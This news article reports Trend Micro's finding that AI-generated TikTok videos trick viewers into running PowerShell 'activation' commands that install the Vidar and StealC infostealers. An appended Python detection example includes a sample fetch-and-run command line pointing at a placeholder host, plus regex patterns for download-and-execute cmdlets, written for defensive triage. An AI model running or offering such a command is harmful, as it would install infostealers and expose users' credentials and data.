- Trend Micro has spotted a new malware campaign on TikTok
- Videos show how to activate “Premium” features in different software
- The clips have been generated by AI and encourage victims to download infostealers
Hackers are publishing AI-generated videos on TikTok to trick users into downloading infostealing malware, researchers at cybersecurity firm Trend Micro have warned.
The premise is simple: attackers use AI to generate many videos demonstrating how to “easily activate” Windows and Microsoft Office, or how to activate “Premium” features in applications such as Spotify or CapCut.
They then share these videos on TikTok, whose algorithm makes it more likely for a video to go viral, which in turn makes the attack more likely to succeed.
A new twist on old tricks
In the clip, a person is shown opening the Run program on Windows, then running a PowerShell command.
In the video, the command is presented as activating special features. In reality, users running the command would download a malicious script which, in turn, deploys the Vidar and StealC infostealers.
These infostealers can take screenshots, steal login credentials, grab credit card data, and exfiltrate cookies, cryptocurrency wallet information, 2FA codes, and more.
“This attack uses videos (possibly generated by AI) to ask users to run PowerShell commands, which are disguised as software activation stages. The algorithmic scope of TikTok increases the probability of a generalized exposure, with a video reaching more than half a million views,” said Trend Micro.
“The videos are very similar, with only minor differences in camera angles and download URLs used by PowerShell to recover the payload,” added the researchers.
“These suggest that the videos have probably been created by automation. The educational voice also seems to be generated by AI, strengthening the probability that AI tools are used to produce these videos.”
One of the videos has around 500,000 views, more than 20,000 likes and more than 100 comments, which makes it rather successful.
Videos have been used to deliver malware in the past, but this new campaign is a major departure from previous methods.
The difference is that before, the link to the malware was shared in the video description or in the comments, where it could still be picked up by security solutions. By delivering the bait in video format, the attackers successfully circumvent almost all security measures.
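Whatever the delivery channel, the command the videos dictate still has to run on the victim's machine, so process-creation telemetry is one place to look for it. The following is an added example, not code from Trend Micro or the original article: it flags PowerShell started from explorer.exe (the parent of anything typed into Run) whose command line both fetches a URL and executes the result. The event field names, pattern lists and sample events are assumptions made for the example.

```python
import re

# Pattern lists are assumptions chosen for this example, not Trend Micro's indicators.
DOWNLOAD = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\"|)]+", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Score one process-creation event; return (score, reasons, url)."""
    if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return 0, [], None
    reasons, cmd = [], ev["command_line"]
    url = URL.search(cmd)
    if basename(ev["parent_image"]) == "explorer.exe":
        reasons.append("launched interactively from explorer.exe")
    if DOWNLOAD.search(cmd) and url:
        reasons.append("fetches remote content")
    if EXECUTE.search(cmd):
        reasons.append("executes fetched content in memory")
    return len(reasons), reasons, url.group(0) if url else None

def triage(events, threshold=3):
    """Return (host, url, reasons) for events meeting all three conditions."""
    hits = []
    for ev in events:
        score, reasons, url = score_event(ev)
        if score >= threshold:
            hits.append((ev["host"], url, reasons))
    return hits

# Constructed sample events (hosts, paths and URLs are made up).
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -c "iex (irm https://activate.example.invalid/a.ps1)"'},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
    {"host": "srv-01", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"host": "ws-03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe"},
]

if __name__ == "__main__":
    for host, url, reasons in triage(SAMPLE_EVENTS):
        print(host, url, "; ".join(reasons))
```

Because the researchers note that the download URL changes from video to video, the extracted URL is returned with each hit so it can be pivoted on rather than matched against a fixed list.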
Via BleepingComputer